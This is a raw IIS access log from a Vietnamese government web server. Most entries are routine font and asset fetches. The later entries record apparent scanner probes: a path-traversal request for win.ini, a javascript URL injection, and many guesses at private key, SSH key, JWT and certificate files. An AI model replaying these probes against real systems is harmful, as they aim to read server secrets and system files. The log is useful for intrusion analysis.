2023-06-27 17:25:04 103.153.214.94 GET /3d5260a1-e4cd-4567-80ed-69d23c40355f-greek.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 247 2023-06-27 17:25:04 103.153.214.94 GET /77caabd3-1877-4634-85c8-8e398a093b99-greek.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 254 2023-06-27 17:25:04 103.153.214.94 GET /e388ac99-8c6a-4451-8690-1d15b4d45adb-greek.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 248 2023-06-27 17:25:04 103.153.214.94 GET /014f2daa-c310-4a36-b9fd-79a8e0c48d44-greek.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 251 2023-06-27 17:25:06 103.153.214.94 GET /12b00842-ec20-4c7f-aa72-802fb00f6cc4-greek.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 249 2023-06-27 17:25:06 103.153.214.94 GET /a1049d00-54ad-4589-95b8-d353f7ab52f0-greek.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 248 2023-06-27 17:25:06 103.153.214.94 GET /13faf0ae-dcab-4d1c-9c08-f9ca339b6023-greek.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 256 2023-06-27 17:25:07 103.153.214.94 GET /e78b17bb-11fb-4860-8d66-4ee0d0c1e117-greek.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 267 2023-06-27 17:25:09 103.153.214.94 GET /d4ffabb3-dd7c-472a-bdfb-6700383c6354-greek.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 825 2023-06-27 17:25:09 103.153.214.94 GET /174d458a-81e0-4174-9473-35e3bf0a613c.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 258 2023-06-27 17:25:09 103.153.214.94 GET /57a79aa3-9b06-4ba7-a9a4-2b766d826ecf.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 259 2023-06-27 17:25:10 103.153.214.94 GET /7db1f672-3a8f-4d19-9c49-7f61aed450b5.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 266 2023-06-27 17:25:11 103.153.214.94 GET /4ab86b35-c0c2-42b5-98ad-4b6eba66b197.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1045 2023-06-27 17:25:12 103.153.214.94 GET /b17468ea-cf53-4635-984b-4d930a68ed4d.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 248 2023-06-27 17:25:12 103.153.214.94 GET /4d1d0d0d-9ea6-4117-901f-8b32ca1ab936.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 257 2023-06-27 17:25:13 103.153.214.94 GET /b0b84e4d-2164-45c7-a674-1662f19f3ba6.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 256 2023-06-27 17:25:13 103.153.214.94 GET /e91d1bbf-3fea-45e2-b003-a22b12ce6e5f.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 276 2023-06-27 17:25:13 103.153.214.94 GET /40d36b4a-60c6-460a-bf43-4c948c23563e.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 259 2023-06-27 17:25:14 103.153.214.94 GET /45b78f45-e639-4836-8612-e0892e120f14.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 253 2023-06-27 17:25:14 103.153.214.94 GET /281f890c-8412-4ee3-84ed-8b5d062d2ab8.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 249 2023-06-27 17:25:14 103.153.214.94 GET /5729f02e-f6b0-4f35-8ee5-c2cffa65fa76.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 250 2023-06-27 17:25:15 103.153.214.94 GET /1fed34fa-250a-4d32-9f1d-42f978a2e0b2.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 251 2023-06-27 17:25:15 103.153.214.94 GET /e57662ff-b1ef-4122-88c1-61bbdabeb365.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 251 2023-06-27 17:25:15 103.153.214.94 GET /2200dfff-da50-40b0-bc12-5e4b872a1998.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 249 2023-06-27 17:25:16 103.153.214.94 GET /dc10b3bd-5076-4df5-a5f5-e5961f4a6938.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 248 2023-06-27 17:25:16 103.153.214.94 GET /2a1ae9a5-b6b5-405c-b660-bbdf1b356952.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 256 2023-06-27 17:25:18 103.153.214.94 GET /a8aeea1b-1a9d-45b7-8ad9-7c71824599e2.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 264 2023-06-27 17:25:18 103.153.214.94 GET /6ea5fa46-5311-450b-8744-288a30c55348.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 265 2023-06-27 17:25:18 103.153.214.94 GET /d9e4040d-32ff-4a1c-ac04-927a781da1f5.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 249 2023-06-27 17:25:19 103.153.214.94 GET /97694c53-4e94-4f9e-969b-a148adfcdcfd.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 263 2023-06-27 17:25:19 103.153.214.94 GET /8b01637a-f445-4f10-92ea-b84a355f7690.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 249 2023-06-27 17:25:19 103.153.214.94 GET /31da4b04-f98a-4b5f-b545-a31d26da99e5.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 258 2023-06-27 17:25:20 103.153.214.94 GET /d98fb015-7ef6-404f-a58a-5c9242d79770.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 252 2023-06-27 17:25:20 103.153.214.94 GET /32a2c5cf-6736-44a6-a276-49ba7e030944.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 263 2023-06-27 17:25:20 103.153.214.94 GET /fa71df11-7b19-4baf-8ff7-3537dea718f0.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 248 2023-06-27 17:25:21 103.153.214.94 GET /a9eaf4d3-6427-42df-9306-3ea1270f7b1a.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 250 2023-06-27 17:25:21 103.153.214.94 GET /f4a085c3-1c64-4fc0-a598-26f3e658c2b0.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 255 2023-06-27 17:25:23 103.153.214.94 GET /94aa531e-7746-4df0-bb6e-349891f2eda5.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1127 2023-06-27 17:25:23 103.153.214.94 GET /121524c1-8d82-4155-bfb3-fd2f15f09e93.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 565 2023-06-27 17:25:24 103.153.214.94 GET /3ae1e25e-3aa6-4061-a016-a079159f9d65.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 507 2023-06-27 17:25:24 103.153.214.94 GET /f1799750-0952-403f-8108-b2402eed0f62.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 539 2023-06-27 17:25:26 103.153.214.94 GET /41331c3c-3759-4462-8695-33c9a21b6a5b.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 512 2023-06-27 17:25:26 103.153.214.94 GET /31e0c094-e345-4a54-a797-d5f1a5885572.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 561 2023-06-27 17:25:27 103.153.214.94 GET /c4cc9032-7eee-4a6e-ae8b-f384b1349bcf.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1361 2023-06-27 17:25:27 103.153.214.94 GET /1b3078ef-2971-4c95-b6ca-13ab528758cb.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 501 2023-06-27 17:25:29 103.153.214.94 GET /c1905e2e-a1cb-49de-9bb0-ce3c5ffc85ae.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 507 2023-06-27 17:25:29 103.153.214.94 GET /341bcc5e-7ac0-44ff-819d-5887892eab1b.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 497 2023-06-27 17:25:29 103.153.214.94 GET /18629a56-2ec3-4470-a65f-f82d7ec4d41b.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 252 2023-06-27 17:25:31 103.153.214.94 GET /439a2ded-d7a4-42d4-8660-ef8765fa7486.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 515 2023-06-27 17:25:31 103.153.214.94 GET /4daa2125-53c6-4da8-9614-8a1049eaccc2.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 252 2023-06-27 17:25:31 103.153.214.94 GET /0763eab1-d6ed-4c73-afb0-895f930df099.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 521 2023-06-27 17:25:32 103.153.214.94 GET /CalciteWebCoreIcons.ttf iz9r4h 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 506 2023-06-27 17:25:32 103.153.214.94 GET /CalciteWebCoreIcons.woff iz9r4h 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 501 2023-06-27 17:25:35 103.153.214.94 GET /CalciteWebCoreIcons.svg iz9r4h 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1304 2023-06-27 17:25:35 103.153.214.94 GET /loading-throb.gif - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 253 2023-06-27 17:25:35 103.153.214.94 GET /basemap-toggle-64.svg - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 258 2023-06-27 17:25:35 103.153.214.94 GET /transparent-bg.png - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 254 2023-06-27 17:25:36 103.153.214.94 GET /Loading_Indicator_double_32.svg - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 255 2023-06-27 17:25:47 103.153.214.94 GET /favicon.ico - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 11720 2023-06-27 17:33:24 103.153.214.94 POST /sess-bin/login_handler.cgi - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn/sess-bin/login_session.cgi 405 0 1 37 2023-06-27 17:43:47 103.153.214.94 GET /pacs/nocache.php path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 37 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 18:00:35 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 18:00:35 103.153.214.94 GET / - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 37 2023-06-27 18:00:36 103.153.214.94 GET / - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 63 2023-06-27 18:01:01 103.153.214.94 GET /files/ldap.debug.txt - 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 30 2023-06-27 18:11:57 103.153.214.94 POST /api/snapshots - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 0 2 52 2023-06-27 18:12:17 103.153.214.94 GET /index.asp - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 45 2023-06-27 18:14:03 103.153.214.94 GET /e/ViewImg/index.html url=javascript:alert(document.domain) 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 39 2023-06-27 18:14:15 103.153.214.94 GET /localhost.key - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 45 2023-06-27 18:14:16 103.153.214.94 GET /host.key - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 30 2023-06-27 18:14:17 103.153.214.94 GET /www.key - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 28 2023-06-27 18:14:17 103.153.214.94 GET /private-key - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 55 2023-06-27 18:14:19 103.153.214.94 GET /privatekey.key - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 29 2023-06-27 18:14:20 103.153.214.94 GET /server.key - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 25 2023-06-27 18:14:22 103.153.214.94 GET /my.key - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 49 2023-06-27 18:14:23 103.153.214.94 GET /key.pem - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 59 2023-06-27 18:14:23 103.153.214.94 GET /ssl/localhost.key - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 33 2023-06-27 18:14:25 103.153.214.94 GET /ssl/bcvt.kontum.gov.vn.key - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 30 2023-06-27 18:14:26 103.153.214.94 GET /id_rsa - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 24 2023-06-27 18:14:27 103.153.214.94 GET /id_dsa - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 57 2023-06-27 18:14:29 103.153.214.94 GET /.ssh/id_rsa - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 43 2023-06-27 18:14:29 103.153.214.94 GET /.ssh/id_dsa - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 28 2023-06-27 18:14:31 103.153.214.94 GET /bcvt.kontum.gov.vn.key - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 26 2023-06-27 18:14:33 103.153.214.94 GET /bcvt.kontum.gov.vn.pem - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 44 2023-06-27 18:14:35 103.153.214.94 GET /config/jwt/private.pem - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 87 2023-06-27 18:14:36 103.153.214.94 GET /jwt/private.pem - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 32 2023-06-27 18:14:37 103.153.214.94 GET /var/jwt/private.pem - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 26 2023-06-27 18:14:39 103.153.214.94 GET /private.pem - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 30 2023-06-27 18:14:43 103.153.214.94 GET /ssl.txt - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 53 2023-06-27 18:14:47 103.153.214.94 GET /ssl_key.txt - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 30 2023-06-27 18:14:52 103.153.214.94 GET /certificates/bcvt.kontum.gov.vn.pfx - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 30 2023-06-27 18:14:57 103.153.214.94 GET /certificates/bcvt.kontum.gov.vn.p12 - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 67 2023-06-27 18:15:02 103.153.214.94 GET /ssl/bcvt.kontum.gov.vn.pem - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 23 2023-06-27 18:15:05 103.153.214.94 GET 